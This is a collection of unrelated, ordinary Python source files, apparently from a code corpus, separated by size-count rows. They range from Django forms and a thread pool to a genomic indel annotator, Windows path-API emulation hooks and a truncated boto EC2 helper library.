        with self.assertRaises(bctr.InvalidDigitForBaseException) as context:
            converter.convert()
        # Fix: str(context.exception), not "".join(context.exception) —
        # an exception object is not an iterable of strings, so the
        # original line raised TypeError instead of performing the check.
        self.assertTrue("invalid digits" in str(context.exception))
| 740 | 235 |
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class UserRegisterForm(UserCreationForm):
    """Registration form: Django's UserCreationForm plus email/name fields."""
    # Required email field (UserCreationForm itself only asks for
    # username and the two password fields).
    email = forms.EmailField(label='Email')
    # Optional name fields; capped at 20 characters each.
    first_name = forms.CharField(
        max_length=20, label='First Name', required=False)
    last_name = forms.CharField(
        max_length=20, label='Last Name', required=False)

    class Meta:
        # Bind the form to the built-in User model and fix field order.
        model = User
        fields = ['username', 'email', 'first_name',
                  'last_name', 'password1', 'password2']
| 544 | 155 |
import logging
import os
import signal
import time
from multiprocessing import Process
class ExternalScript:
    """Wraps a user-supplied script and runs its main_loop in a child process."""

    def __init__(self, name, path):
        self.name = name
        self.path = path
        self.process = None  # Process handle; None while not running

    def start_main_loop(self):
        """Spawn the child process; does nothing if one is already running."""
        if self.process is not None:
            return
        self.process = Process(target=run_external_script_main_loop,
                               args=(self.name, self.path))
        self.process.start()
        logging.info("External script started. PID: %d", self.process.pid)

    def stop_main_loop(self):
        """Terminate the running child process, if any, and drop its handle."""
        if self.process is not None:
            logging.info("Killing external script with PID: %d", self.process.pid)
            os.kill(self.process.pid, signal.SIGTERM)
            self.process = None
def run_external_script_main_loop(name, path):
    """Load the script at *path* and call its main_loop() forever.

    Runs inside the child process. An error raised by a single
    main_loop() iteration is logged and the loop continues; a failure to
    load the script is logged and the function returns.

    Args:
        name (str): module name to import the script under
        path (str): filesystem path of the script
    """
    try:
        script = import_source(name, path)
        logging.info("Script loaded")
        while True:  # idiomatic spelling of the original `while 1`
            start = time.time()
            try:
                script.main_loop()
            except Exception as e:
                logging.error("Error in script '%s': %s", path, str(e))
            # Throttle scripts whose main_loop returns almost instantly so
            # a trivial or broken loop does not spin the CPU.
            if (time.time() - start) < .05:
                time.sleep(1)
    except Exception as e1:
        # Lazy %-style args (the original built the message eagerly with +).
        logging.error("Unable to run main_loop: %s", str(e1))
def import_source(name, path):
    """Import the Python source file at *path* as a module named *name*.

    Fix: SourceFileLoader.load_module() is deprecated since Python 3.4;
    this uses the documented importlib.util spec-based replacement.

    Args:
        name (str): name to register the module under
        path (str): filesystem path of the .py file
    Returns:
        module: the freshly executed module object
    """
    import importlib.util
    import sys
    spec = importlib.util.spec_from_file_location(name, path)
    module = importlib.util.module_from_spec(spec)
    # Register before executing, matching load_module()'s behavior so the
    # script can be found in sys.modules (e.g. by pickling or re-imports).
    sys.modules[name] = module
    spec.loader.exec_module(module)
    return module
| 1,391 | 404 |
import logging
import os

# Log to ~/.cache/spotui.log, truncating on each run.
user_config_dir = os.path.expanduser("~")
_log_dir = os.path.join(user_config_dir, ".cache")
# Fix: basicConfig raises FileNotFoundError if ~/.cache does not exist.
os.makedirs(_log_dir, exist_ok=True)
logging.basicConfig(filename=os.path.join(_log_dir, 'spotui.log'), filemode='w',
                    format='%(name)s - %(levelname)s - %(message)s')
| 220 | 76 |
# -*- coding: utf-8 -*-
'''
Created on 15/06/2015
@author: david
'''
import sys
if sys.version_info.major < 3:
from SocketServer import TCPServer
else:
from socketserver import TCPServer
import datetime
import logging
from remote_control.dispatching import Dispatcher
def main():
    """Configure file logging and serve the remote-control TCP server forever.

    Listens on 0.0.0.0:2121 and dispatches connections to Dispatcher.
    Stops cleanly on Ctrl+C.
    """
    logging.basicConfig(filename="remote_control_{0}.log".format(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")), \
                        format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%d/%m/%y %H:%M:%S', \
                        level=logging.ERROR)
    # NOTE(review): these info messages are suppressed by level=ERROR above;
    # kept as-is since lowering the level would change runtime output.
    logging.info("**** [Starting server...] ****")
    server = TCPServer(("0.0.0.0", 2121), Dispatcher)
    message = "Waiting for remote control..."
    logging.info(message)
    print(message)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print("[CTRL+C] -> Stop")
    finally:
        # Fix: release the listening socket explicitly; it was leaked before.
        server.server_close()
        print("Goodbye!")
        logging.info("**** [Server finish] ****")

if __name__ == '__main__':
    main()
| 1,029 | 364 |
from queue import Queue, Empty
import threading
from threading import Thread
class Worker(Thread):
    """Daemon thread that consumes (func, args, kwargs) tasks from a queue.

    The thread can be asked to stop via signal_exit(); it re-checks the
    stop flag every _TIMEOUT seconds while waiting for work.
    """
    _TIMEOUT = 2

    def __init__(self, tasks, th_num):
        Thread.__init__(self)
        self.tasks = tasks
        self.th_num = th_num
        self.daemon = True
        self.done = threading.Event()
        self.start()

    def run(self):
        while not self.done.is_set():
            try:
                func, args, kwargs = self.tasks.get(block=True,
                                                    timeout=self._TIMEOUT)
            except Empty:
                continue  # no work yet; loop back and re-check the flag
            try:
                func(*args, **kwargs)
            except Exception as e:
                print(e)
            finally:
                self.tasks.task_done()

    def signal_exit(self):
        """Ask the thread to exit after its current wait/task."""
        self.done.set()
class ThreadPool:
    """Pool of threads consuming tasks from a queue"""

    def __init__(self, num_threads, tasks=None):
        """Create *num_threads* workers and optionally pre-load *tasks*.

        Fix: the original default was a mutable list (tasks=[]), shared
        between every call that relied on the default; None is now the
        sentinel, which is backward compatible for all callers.
        """
        # NOTE: the queue is bounded to num_threads, so add_task blocks
        # once that many tasks are pending (original behavior, preserved).
        self.tasks = Queue(num_threads)
        self.workers = []
        self.done = False
        self._init_workers(num_threads)
        for task in (tasks if tasks is not None else []):
            self.tasks.put(task)

    def _init_workers(self, num_threads):
        # Workers start themselves on construction.
        for i in range(num_threads):
            self.workers.append(Worker(self.tasks, i))

    def add_task(self, func, *args, **kwargs):
        """Add a task to the queue"""
        self.tasks.put((func, args, kwargs))

    def _close_all_threads(self):
        """ Signal all threads to exit and lose the references to them """
        for workr in self.workers:
            workr.signal_exit()
        self.workers = []

    def wait_completion(self):
        """Wait for completion of all the tasks in the queue"""
        self.tasks.join()

    def __del__(self):
        self._close_all_threads()
def create_task(func, *args, **kwargs):
    """Package a callable and its arguments as a task tuple for the pool."""
    return func, args, kwargs
if __name__ == '__main__':
    # Demo: 30 random sleeps spread over a 20-thread pool.
    from random import randrange
    from time import sleep

    delays = [randrange(1, 10) for _ in range(30)]

    def wait_delay(d):
        print('sleeping for (%d)sec' % d)
        sleep(d)

    pool = ThreadPool(20)
    for d in delays:
        pool.add_task(wait_delay, d)
    pool.wait_completion()
from ..utils.log import log, INFO, ERROR, PASS
from ..utils.isaac import kill_irritating_popup, disable_irritating_popup
from ..utils.i_selenium import assert_tab
from ..tests import TestWithDependency
__all__ = ["questionnaire"]
#####
# Test : Questionnaire Popup
#####
@TestWithDependency("QUESTIONNAIRE", ["LOGIN"])
def questionnaire(driver, ISAAC_WEB, **kwargs):
    """Test if the questionnaire popup is shown.
    Must run immediately after the "LOGIN" test.

    - 'driver' should be a Selenium WebDriver.
    - 'ISAAC_WEB' is the string URL of the Isaac website to be tested.
    """
    assert_tab(driver, ISAAC_WEB)
    log(INFO, "Ensure the popup has not been disabled, and wait 30 seconds for it to display.")
    # Re-enable the popup first, in case an earlier test suppressed it.
    disable_irritating_popup(driver, undo=True)
    # Guard-clause form: bail out early when the popup never appears.
    if not kill_irritating_popup(driver, 30):
        log(ERROR, "Questionnaire popup not shown! This may be because none are published?")
        return False
    log(PASS, "Questionnaire popup shown and closed.")
    return True
| 1,069 | 328 |
#!/usr/bin/env python3
"""2nd step of the analysis
Checks if indels are coding or non-coding and annotates
coding indels with variant effect
indel_annotator is the main routine of this module
"""
import sys
import pysam
import logging
import pandas as pd
from functools import partial
from .indel_curator import curate_indel_in_genome
from .indel_sequence import CodingSequenceWithIndel
logger = logging.getLogger(__name__)
def indel_annotator(df, refgene, fasta, chr_prefixed):
    """Sort coding indels and annotate coding indels with variant effect

    Args:
        df (pandas.DataFrame): with a header:'chr', 'pos', 'ref', 'alt'
        refgene (str): path to refCodingExon.bed.gz
        fasta (str): path to fasta
        chr_prefixed (bool): True if chromosome names in BAM are "chr"-prefixed
    Returns:
        df (pandas.DataFrame): with indels annotated
    """
    df["is_ins"] = df.apply(is_insertion, axis=1)
    df["indel_seq"] = df.apply(get_indel_seq, axis=1)

    # performs annotation
    exon_data = pysam.TabixFile(refgene)
    anno = partial(
        annotate_indels, exon_data=exon_data, fasta=fasta, chr_prefixed=chr_prefixed
    )
    df["annotation"] = df.apply(anno, axis=1)

    # removes unannotated calls (non-coding indels)
    df = df[df["annotation"] != "-"]
    if len(df) == 0:
        # Fix: use the module-level logger (defined at the top of this
        # module) instead of the root logger for consistent log routing.
        logger.warning("No indels annotated in coding region. Analysis done.")
        sys.exit(0)

    # gene symbols
    df["gene_symbol"] = df.apply(get_gene_symbol, axis=1)

    # formats the header
    df = df[
        [
            "chr",
            "pos",
            "ref",
            "alt",
            "rescued",
            "indel_seq",
            "annotation",
            "gene_symbol",
            "is_ins",
        ]
    ]

    return df
def is_insertion(row):
    """Encodes if the indel is an insertion or deletion.

    Args:
        row (pandas.Series): reference seq (str) at index 'ref'
    Returns:
        is_insertion (int): 1 if insertion, 0 if deletion

    Fix: the original docstring had the encoding inverted ("0 if
    insertion, 1 if deletion") while the code returns 1 for insertions.
    """
    # An insertion is represented with '-' in the 'ref' column.
    return 1 if row["ref"] == "-" else 0
def get_indel_seq(row):
    """Return the inserted or deleted sequence of an indel record.

    Args:
        row (pandas.Series): a Series with 'ref' and 'alt' indices
    Returns:
        str: the 'alt' sequence for insertions (ref == '-'), otherwise
             the 'ref' sequence (deletions)
    """
    return row["alt"] if row["ref"] == "-" else row["ref"]
def annotate_indels(row, exon_data, fasta, chr_prefixed, postprocess=False):
    """Annotates indels for all RefSeq isoforms

    Args:
        row (pandas.Series): a Series with indices
                             'chr', 'pos', 'is_ins', 'indel_seq'
        exon_data (pysam.TabixFile): coding exon database
        fasta (str): path to fasta file
        chr_prefixed (bool): True if chromosome names in BAM are "chr"-prefixed
        postprocess (bool): True if used in indel_postprocessor. Default to False
    Returns:
        annotation (str): Each token represents an annotation for one
                          of the isoforms and is formatted as:

                          GeneSymbol|RefSeqAccession|AminoAcidPostion|Effect|IsInsensitive

                          GeneSymbol: RefSeq gene name
                          RefSeqAccession: RefSeq mRNA accession number
                          CodonPostion: the position of codon (not amino acid) affected in
                                        the isoform specified in RefSeqAccession
                          Effect: consequences of the indel.
                                  See CodingSequenceWithIndel for detail
                          IsInsensitive: 1 if the indel is nonsense-mediated-decay insensitive,
                                         0 otherwise (omitted when postprocess=True)

                          '-' for non-coding indels
    """
    chr = row["chr"]
    pos = row["pos"]
    idl_type = row["is_ins"]
    idl_seq = row["indel_seq"]

    # generates CodingSequenceWithIndel instances (empty for non-coding indels)
    idls = generate_coding_indels(
        chr, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed
    )

    # annotates for all RefSeq isoforms
    annots = []
    for idl in idls:
        codon_pos, effect = idl.effect()
        # computed unconditionally, as before (only reported when not
        # postprocessing)
        is_insensitive = idl.is_nmd_insensitive()
        fields = [idl.gene_symbol, idl.accession, str(codon_pos), effect]
        if not postprocess:
            fields.append(str(is_insensitive))
        # str.join instead of the original chain of '+' concatenations
        annots.append("|".join(fields))

    # '-' marks non-coding indels (no isoform hit)
    return ",".join(annots) if annots else "-"
def generate_coding_indels(chr, pos, idl_type, idl_seq, exon_data, fasta, chr_prefixed):
    """Generates coding indel objects

    Args:
        chr (str): chr1-22, chrX or chrY. Note "chr"-prefixed.
        pos (int): 1-based genomic position
        idl_type (int): 1 for insertion, 0 for deletion
        idl_seq (str): inserted or deleted sequence
        exon_data (pysam.TabixFile): coding exon database
        fasta (str): path to fasta file
        chr_prefixed (bool): True if chromosome names in BAM or FASTA are "chr"-prefixed
    Returns:
        coding_idl_lst (list): a list of CodingSequenceWithIndel obj
                               empty list if non-coding indel
    """
    coding_idl_lst = []
    # Fix: narrow the original bare `except:` so SystemExit and
    # KeyboardInterrupt are no longer swallowed; a fetch on an unknown
    # contig/region still falls through to "no candidates".
    try:
        candidate_genes = exon_data.fetch(chr, pos - 11, pos + 11)
    except Exception:
        candidate_genes = None

    # check for UTR
    if candidate_genes:
        for line in candidate_genes:
            lst = line.split("\t")

            # parsing exon info
            info = lst[3].split("|")
            exon = int(info[2])
            last_exon = int(info[3])

            # exon start and end
            exon_start, exon_end = int(lst[1]), int(lst[2])

            # strand
            strand = lst[4]

            # 5'UTR on positive strand (insertion)
            if strand == "+" and exon == 1 and idl_type == 1 and exon_start >= pos:
                pass
            # 5'UTR on positive strand (deletion)
            elif strand == "+" and exon == 1 and idl_type == 0 and exon_start > pos:
                pass
            # 3'UTR on positive strand
            elif strand == "+" and exon == last_exon and pos > exon_end:
                pass
            # 5'UTR on negative strand
            elif strand == "-" and exon == 1 and pos > exon_end:
                pass
            # 3'UTR on negative strand (insertion)
            elif (
                strand == "-"
                and exon == last_exon
                and idl_type == 1
                and exon_start >= pos
            ):
                pass
            # 3'UTR on negative strand (deletion)
            elif (
                strand == "-"
                and exon == last_exon
                and idl_type == 0
                and exon_start > pos
            ):
                pass
            else:
                # In a coding exon: build the full CodingSequenceWithIndel
                # object from the reference flanks and exon layout.
                indel_in_reference_genome = curate_indel_in_genome(
                    fasta, chr, pos, idl_type, idl_seq, chr_prefixed
                )
                lt_seq = indel_in_reference_genome.lt_seq
                rt_seq = indel_in_reference_genome.rt_seq
                accession = info[0]
                gene_symbol = info[1]
                cds_start = int(info[4])
                prev_exon = lst[5].split("|")
                prev_exon_start, prev_exon_end = int(prev_exon[0]), int(prev_exon[1])
                next_exon = lst[6].split("|")
                next_exon_start, next_exon_end = int(next_exon[0]), int(next_exon[1])

                indel = CodingSequenceWithIndel(
                    chr,
                    pos,
                    idl_type,
                    lt_seq,
                    idl_seq,
                    rt_seq,
                    strand,
                    accession,
                    gene_symbol,
                    exon,
                    exon_start,
                    exon_end,
                    last_exon,
                    cds_start,
                    prev_exon_start,
                    prev_exon_end,
                    next_exon_start,
                    next_exon_end,
                )

                coding_idl_lst.append(indel)

    return coding_idl_lst
def get_gene_symbol(row):
    """Extracts gene name from annotation

    Args:
        row (pandas.Series): annotation info (str) at 'annotation' index
    Returns:
        gene_symbol (str): unique gene name(s), in first-seen order
    """
    pd.options.mode.chained_assignment = None

    tokens = row["annotation"].split(",")
    genes = [token.split("|")[0] for token in tokens]
    # Fix: dedupe with dict.fromkeys to preserve first-seen order.
    # The original ",".join(set(genes)) produced a nondeterministic
    # ordering across runs (string hash randomization).
    return ",".join(dict.fromkeys(genes))
| 8,893 | 2,760 |
def cavity_map(grid):
    """Hackerrank Problem: https://www.hackerrank.com/challenges/cavity-map/problem

    You are given a square map as a matrix of integer strings. Each cell of the map has a value denoting its depth.
    We will call a cell of the map a cavity if and only if this cell is not on the border of the map and each cell
    adjacent to it has strictly smaller depth. Two cells are adjacent if they have a common side, or edge.
    Find all the cavities on the map and replace their depths with the uppercase character X.

    For example, given a matrix:
    989
    191
    111

    You should return:
    989
    1X1
    111

    The center cell was deeper than those on its edges: [8,1,1,1]. The deep cells in the top two corners don't share an
    edge with the center cell.

    Args:
        grid (list): a list of strings denoting the depths of the teeth

    Returns:
        list: a new list of strings with X's where there are cavities;
              the input list is left unmodified
    """
    # Fix: copy the list instead of aliasing it (output_grid = grid),
    # which mutated the caller's list in place. Comparisons still read
    # from the untouched input, so results are unchanged.
    output_grid = list(grid)
    n = len(grid)
    # Only interior cells can be cavities; range() works on Py2 and Py3
    # (the original xrange is Python-2-only).
    for i in range(1, n - 1):
        for j in range(1, n - 1):
            depth = grid[i][j]
            # Single-digit strings compare like their numeric values here.
            if (depth > grid[i + 1][j] and depth > grid[i - 1][j]
                    and depth > grid[i][j + 1] and depth > grid[i][j - 1]):
                output_grid[i] = output_grid[i][:j] + "X" + output_grid[i][j + 1:]
    return output_grid
if __name__ == "__main__":
    # Renamed from `map` to avoid shadowing the builtin; print() form is
    # valid on both Python 2 and 3 (the original print statement is a
    # syntax error under Python 3).
    depth_map = ["1112", "1912", "1892", "1234"]
    print(cavity_map(depth_map))
"""
Functions found in shlwapi.dll
Shell Lightweight Utility Functions
"""
import logging
import ntpath
from ...call_hooks import builtin_func
logger = logging.getLogger(__name__)
@builtin_func("PathAppendA")
@builtin_func("PathAppendW")
#typedef(BOOL PathAppendA(LPSTR pszPath,LPCSTR pszMore);)
def pathappend(cpu_context, func_name, func_args):
    """
    Appends one path to the end of another
    """
    # W-suffixed variants operate on wide (UTF-16) strings.
    wide = func_name.endswith(u"W")
    path_ptr, more_ptr = func_args
    base = cpu_context.memory.read_string(path_ptr, wide=wide)
    extra = cpu_context.memory.read_string(more_ptr, wide=wide)
    # Join with Windows path semantics and write back in place.
    cpu_context.memory.write_string(path_ptr, ntpath.join(base, extra), wide=wide)
    return True
@builtin_func("PathAddBackslashA")
@builtin_func("PathAddBackslashW")
#typedef(LPWSTR PathAddBackslashW(LPWSTR pszPath));)
def pathaddbackslash(cpu_context, func_name, func_args):
    """
    Appends a backslash to the end of the path, if one is not already there.

    Fix: the Win32 PathAddBackslash API only adds the separator when the
    string does not already end with a backslash; the original emulation
    appended unconditionally, producing a double backslash.
    """
    wide = func_name.endswith(u"W")
    path_ptr = func_args[0]
    curr_path = cpu_context.memory.read_string(path_ptr, wide=wide)
    if not curr_path.endswith("\\"):
        cpu_context.memory.write_string(path_ptr, curr_path + "\\", wide=wide)
    return True
| 1,242 | 451 |
from django.urls import path
from . import views
# URL routes for the accounting app; each `name` is used for reverse()
# lookups and {% url %} tags in templates.
urlpatterns = [
    path('', views.index, name='index'),
    path('info', views.info, name='info'),
    path('chart', views.charts, name='chart'),
    # Reports
    path('trialbalance', views.trialbalance, name='trialbalance'),
    path('ledger', views.ledger, name='ledger'),
    path('balancesheet', views.balancesheet, name='balancesheet'),
    path('incomestatement', views.incomestatement, name='incomestatement'),
    path('journalize', views.journalize, name='journalize'),
    # Authentication / registration
    path('sign_up/', views.sign_up, name='sign_up'),
    path("insertaccount", views.insertaccount, name='insertaccount'),
    path("inserjournal", views.inserjournal, name='inserjournal'),
    path("register", views.signupform, name='register'),
    path("login", views.loginForm, name='login'),
    path("logout", views.logusout, name='logout'),
    path("log_in", views.log_me_in, name='log_in'),
    # Journal management
    path("journal_list", views.journalList, name='journal_list'),
    path("journal_control",views.journalControls,name='journalControls')
]
# Re-export the package's public API at the top level.
from .smores import Smores, AutocompleteResponse, TemplateString, TemplateFile, Schema, Nested

# Explicit public surface for `from <package> import *`.
__all__ = ['Smores', 'AutocompleteResponse', 'TemplateString', 'TemplateFile', 'Schema', 'Nested']
| 194 | 54 |
"""
IcsEc2: Library for EC2
-----------------------
+--------------------+------------+--+
| This is the IcsEc2 common library. |
+--------------------+------------+--+
"""
from operator import attrgetter
from time import time, mktime, sleep, gmtime, strftime, strptime
from boto.ec2 import get_region
from boto.ec2.connection import EC2Connection
from boto.vpc import connect_to_region as vpc_connect_to_region
from opslib.icsexception import IcsEc2Exception
import logging
log = logging.getLogger(__name__)
class IcsEc2(EC2Connection):
"""
ICS Library for EC2
"""
def __init__(self, region, **kwargs):
super(IcsEc2, self).__init__(
region=get_region(region), **kwargs)
def get_instance_attribute(self, instance_id, attr_name):
"""
Get the attribute value of an instance.
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:type attr_name: string
:param attr_name: the name of the instance attribute,
details shown as below:
:ivar id: The unique ID of the Instance.
:ivar groups: A list of Group objects representing the security
groups associated with the instance.
:ivar public_dns_name: The public dns name of the instance.
:ivar private_dns_name: The private dns name of the instance.
:ivar state: The string representation of the instance's current state.
:ivar state_code: An integer representation of the instance's
current state.
:ivar previous_state: The string representation of the instance's
previous state.
:ivar previous_state_code: An integer representation of the
instance's current state.
:ivar key_name: The name of the SSH key associated with the instance.
:ivar instance_type: The type of instance (e.g. m1.small).
:ivar launch_time: The time the instance was launched.
:ivar image_id: The ID of the AMI used to launch this instance.
:ivar placement: The availability zone in which the instance is
running.
:ivar placement_group: The name of the placement group the instance
is in (for cluster compute instances).
:ivar placement_tenancy: The tenancy of the instance, if the instance
is running within a VPC. An instance with a tenancy of dedicated
runs on a single-tenant hardware.
:ivar kernel: The kernel associated with the instance.
:ivar ramdisk: The ramdisk associated with the instance.
:ivar architecture: The architecture of the image (i386|x86_64).
:ivar hypervisor: The hypervisor used.
:ivar virtualization_type: The type of virtualization used.
:ivar product_codes: A list of product codes associated with
this instance.
:ivar ami_launch_index: This instances position within
it's launch group.
:ivar monitored: A boolean indicating whether monitoring is
enabled or not.
:ivar monitoring_state: A string value that contains the actual value
of the monitoring element returned by EC2.
:ivar spot_instance_request_id: The ID of the spot instance request
if this is a spot instance.
:ivar subnet_id: The VPC Subnet ID, if running in VPC.
:ivar vpc_id: The VPC ID, if running in VPC.
:ivar private_ip_address: The private IP address of the instance.
:ivar ip_address: The public IP address of the instance.
:ivar platform: Platform of the instance (e.g. Windows)
:ivar root_device_name: The name of the root device.
:ivar root_device_type: The root device type (ebs|instance-store).
:ivar block_device_mapping: The Block Device Mapping for the instance.
:ivar state_reason: The reason for the most recent state transition.
:ivar groups: List of security Groups associated with the instance.
:ivar interfaces: List of Elastic Network Interfaces associated with
this instance.
:ivar ebs_optimized: Whether instance is using optimized EBS volumes
or not.
:ivar instance_profile: A Python dict containing the instance
profile id and arn associated with this instance.
"""
if not isinstance(instance_id, basestring):
raise IcsEc2Exception(
"instance_id should be a 'str' not %s" % type(instance_id))
if not isinstance(attr_name, basestring):
raise IcsEc2Exception(
"attr_name should be a 'str' not %s" % type(attr_name))
resource = self.get_all_instances(instance_ids=instance_id)[0]
instance = resource.instances[0]
return attrgetter(attr_name)(instance)
def get_public_address(self, instance_id):
"""
Get the public IPv4 address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the public IPv4 address
"""
return self.get_instance_attribute(instance_id, "ip_address")
def get_private_address(self, instance_id):
"""
Get the private IPv4 address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the private IPv4 address
"""
return self.get_instance_attribute(instance_id, "private_ip_address")
def get_public_dns(self, instance_id):
"""
Get the public dns address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the public dns address
"""
return self.get_instance_attribute(instance_id, "public_dns_name")
def get_private_dns(self, instance_id):
"""
Get the private dns address of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: string
:return: a string containing the private IPv4 address
"""
return self.get_instance_attribute(instance_id,
"private_dns_name")
def get_instance_tags(self, instance_id):
"""
Get tags of the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
:rtype: dict
:return: a dictionary containing the tags of this instance
"""
tags = self.get_all_tags(filters={"resource-id": instance_id})
ret = {}
for tag in tags:
ret.update({tag.name: tag.value})
return ret
def add_instance_tags(self, instance_id, tags):
"""
Add tags to the instance
:type instance_id: string
:param instance_id: EC2 instance id startwith 'i-xxxxxxx'
"""
return self.create_tags(instance_id, tags)
def del_instance_tags(self, instance_id, tags):
    """
    Remove tags of the instance

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :type tags: dict
    :param tags: tags to remove, like {'Name': 'XXX'}
    """
    # Delegates to the boto connection's delete_tags.
    return self.delete_tags(instance_id, tags)
def get_eips_from_addr(self, eip_list):
    """
    Get EIP objects via the list of EIP addresses

    :type eip_list: list
    :param eip_list: the list of EIP addresses

    :rtype: list
    :return: list of boto Address (EIP) objects
        (callers index into the result, e.g. is_eip_free)
    """
    return self.get_all_addresses(
        filters={'public-ip': eip_list})
def get_eips_from_instance(self, instance_id):
    """
    Get EIP objects via the instance id

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :rtype: list
    :return: list of boto Address (EIP) objects attached to the instance
    """
    return self.get_all_addresses(
        filters={'instance-id': instance_id})
def get_instance_event(self, instance_id):
    """
    Get the event of the specified instance

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :return: the scheduled events of the first matching instance status
    """
    result = self.get_all_instance_status(
        instance_ids=instance_id)
    # Only one instance id is queried, so the first status entry is it.
    return result[0].events
def get_instance_status(self, instance_id):
    """
    Get the instance status and system status
    of the specified instance

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :rtype: tuple
    :return: a tuple contains (instance_status, system_status)
    """
    # Only one instance id is queried, so take the first status record.
    status = self.get_all_instance_status(instance_ids=instance_id)[0]
    return (status.instance_status.status, status.system_status.status)
def is_instance_healthy(self, instance_id):
    """
    check the health of the specified instance

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :rtype: boolean
    :return: True/False
    """
    # Healthy means both the instance check and the system check report "ok".
    instance_state, system_state = self.get_instance_status(instance_id)
    return instance_state.lower() == "ok" and system_state.lower() == "ok"
def is_eip_free(self, eip):
    """
    check the availability of the specified EIP address: free or not

    :type eip: string
    :param eip: one EIP address

    :rtype: tuple
    :return: (True/False, EIP object/None)

    :raises IcsEc2Exception: if the lookup returns a different address
        than the one requested
    """
    eip_ops = self.get_eips_from_addr(eip)
    # No matching address at all: not usable, and no object to hand back.
    if not eip_ops:
        return (False, None)
    eip_op = eip_ops[0]
    # Sanity check: the public-ip filter must return exactly the requested address.
    if eip_op.public_ip != eip:
        raise IcsEc2Exception(
            "the real eip address %s is not equal to the expected one %s"
            % (eip_op.public_ip, eip))
    # An EIP already attached to an instance is not free.
    if eip_op.instance_id:
        return (False, eip_op)
    else:
        return (True, eip_op)
def bind_eip(self, eip, instance_id):
    """
    Bind EIP address to the instance

    :type eip: string
    :param eip: one EIP address (a list is rejected)

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :rtype: bool
    :return: True when the EIP ends up (or already was) associated with
        this instance, False when it is held by another instance

    :raises IcsEc2Exception: if *eip* is a list
    """
    if isinstance(eip, list):
        raise IcsEc2Exception(
            "cannot associate multiple eips '%s' to one instance '%s'"
            % (eip, instance_id))
    result, eipop = self.is_eip_free(eip)
    if result:
        log.info("the eip address " +
                 "'%s' will be associated " % eip +
                 "with this instance '%s'"
                 % instance_id)
        # VPC addresses must be associated via their allocation id;
        # EC2-Classic addresses are associated directly on the object.
        if eipop.domain == "vpc":
            self.associate_address(
                instance_id=instance_id, allocation_id=eipop.allocation_id)
        else:
            eipop.associate(instance_id=instance_id)
    elif eipop.instance_id != instance_id:
        # Held by someone else -- do not steal it.
        log.warning(
            "this eip '%s' has been associated with another '%s'"
            % (eip, eipop.instance_id))
        return False
    else:
        # Already attached to this very instance -- nothing to do.
        log.info("the eip address " +
                 "'%s' has been associated " % eip +
                 "with this instance '%s'"
                 % instance_id)
        return True
    # Re-query so the return value reflects the post-association state.
    result, eipop = self.is_eip_free(eip)
    return not result and eipop.instance_id == instance_id
def free_eip(self, eip, instance_id):
    """
    Free EIP address to the instance

    :type eip: string
    :param eip: one EIP address (a list is rejected)

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :rtype: bool
    :return: True when the EIP is no longer bound to this instance
        (including the cases where it was never bound, or is bound to a
        different instance); False if the disassociation did not take

    :raises IcsEc2Exception: if *eip* is a list
    """
    if isinstance(eip, list):
        raise IcsEc2Exception(
            "cannot free multiple eips '%s' to one instance '%s'"
            % (eip, instance_id))
    result, eipop = self.is_eip_free(eip)
    if result:
        # Already free -- treat as success.
        log.warning("this eip '%s' is not associated with '%s'"
                    % (eip, instance_id))
        return True
    elif eipop.instance_id != instance_id:
        # Bound to another instance -- not ours to free; still "done".
        log.warning(
            "this eip '%s' has been associated with another '%s'"
            % (eip, eipop.instance_id))
        return True
    log.info("the eip address " +
             "'%s' will be disassociated with this instance '%s'"
             % (eip, instance_id))
    eipop.disassociate()
    # Re-check so the return value reflects the post-disassociation state.
    return self.is_eip_free(eip)[0]
def get_volumes_by_instance(self, instance_id, device_name=None):
    """
    Get boto Volume Objects by instance Id or device name

    :type instance_id: string
    :param instance_id: EC2 instance id starting with 'i-xxxxxxx'

    :type device_name: string
    :param device_name: device name like '/dev/sdf'

    :rtype: list
    :return: list of boto volume objects
    """
    # Always filter by attachment instance; narrow further by device
    # only when one was requested.
    filters = {'attachment.instance-id': instance_id}
    if device_name is not None:
        filters['attachment.device'] = device_name
    return self.get_all_volumes(filters=filters)
def take_snapshot(self, volume_id, description=None, tags=None):
    """
    Take a snapshot to existing volume with specific tags

    :type volume_id: string
    :param volume_id: EC2 volume id starting with 'vol-xxxxxxx'

    :type description: string
    :param description: words to describe the usage of this snapshot

    :type tags: dict
    :param tags: snapshot tags like {'Name': 'XXX'}
        NOTE(review): a caller-supplied dict is mutated in place
        (VolumeId/Timestamp are added to it).

    :rtype: class
    :return: boto snapshot object
    """
    if tags is None:
        tags = {}
    snapshot = self.create_snapshot(volume_id, description)
    # Record provenance on the snapshot: source volume and creation time (UTC).
    tags.update({'VolumeId': volume_id})
    timestamp = strftime("%Y%m%d-%H%M", gmtime())
    tags.update({'Timestamp': timestamp})
    # Python 2 only (dict.iteritems). Plain names have '_' rewritten to '-';
    # 'tag:'-prefixed names only lose the prefix -- NOTE(review): confirm
    # this asymmetric normalization is intended.
    for name, value in tags.iteritems():
        if not name.startswith('tag:'):
            name = name.replace('_', '-')
        else:
            name = name.replace('tag:', '')
        snapshot.add_tag(name, value)
    return snapshot
@staticmethod
def format_tags(tags):
    """
